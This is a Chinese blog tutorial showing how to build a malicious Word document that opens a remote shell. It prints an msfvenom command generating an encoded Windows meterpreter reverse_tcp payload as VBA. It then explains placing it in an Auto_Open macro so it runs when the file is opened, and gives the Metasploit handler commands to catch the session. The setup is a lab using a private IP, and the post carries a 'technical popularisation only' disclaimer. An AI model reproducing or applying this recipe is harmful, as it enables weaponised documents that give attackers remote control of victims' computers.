利用word文档获取shell

0652260

先把cn_office_professional_plus_2007_dvd_X12-38713.rar上传到win7虚拟上,解压后,安装
然后打开kali生成恶意代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f vba-exe

20250228231943966-1

复制代码从Uuvqcerqez开始到最后,回到win7 打开word点击视图点击宏 宏名为Auto_Open新建文档

20250228232028606-2

复制第一段代码粘贴到上面保存

20250228232102419-3

之后把第二段粘贴到正文保存为启用宏的文档

20250228232133412-4

回到kali配置监听模块

msfconsole
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler msf5 
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set 
LHOST 192.168.1.53 msf5 exploit(multi/handler) > jobs -K msf5 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF, 关闭word文档之后session不受影响

20250228232153448-5

20250228232215383-6

成功.

© 版权声明
相关声明 1 本站名称:铭心博客
2 本站永久网址:https://www.imxbk.com/
3 本文内容仅为技术科普,请勿用于非法用途。
4本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5 根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途。
6 本文内容未隐讳任何个人、群体、公司。非文学作品,请勿用于阅读理解的练习。
7 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
THE END
网络安全
# 渗透测试# Kali Linux
喜欢就支持一下吧!
点赞260 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容

1华为交换机文件系统介绍

2Ubuntu升级或安装最新版本的Nginx

3Fuxploider工具

4Python打包.exe可执行文件

5跨站脚本攻击(Payload)

6Linux 系统自动化部署系统

随机文章
qlhl的头像-铭心博客

qlhl6天前0

感谢分享表情[keai]-铭心博客
dl2002的头像-铭心博客SVIP会员

dl20022个月前0

来评论一下
dl2002的头像-铭心博客SVIP会员

dl20022个月前0

写的太好了
标签云
教程分享eNSP华为资源分享网络安全华为模拟器Linux渗透测试环境搭建windowsKali LinuxPythonC信息收集编程GITHUB开源开源项目centos开源推荐搭建环境信息安全网站源码工具推荐开源程序操作系统服务器系统BlogUbuntu系统安全HTMLLinux 服务器MYSQLPhotoshopUbuntu数据库暴力破解源码路由器软件推荐NGINXshellSSH数据安全数据泄露服务器运维漏洞复现脚本IPPHPPSVMwareWEBWin11WordPress音乐播放器源码DDOSIOSJavaScriptMacnmap个人隐私代码免费软件加密图像处理密码学开源源码悬浮音乐播放器源码下载漏洞扫描电脑日常使用问题网络攻击虚拟机软件软件分享隐私安全音乐播放器Adobe Photoshop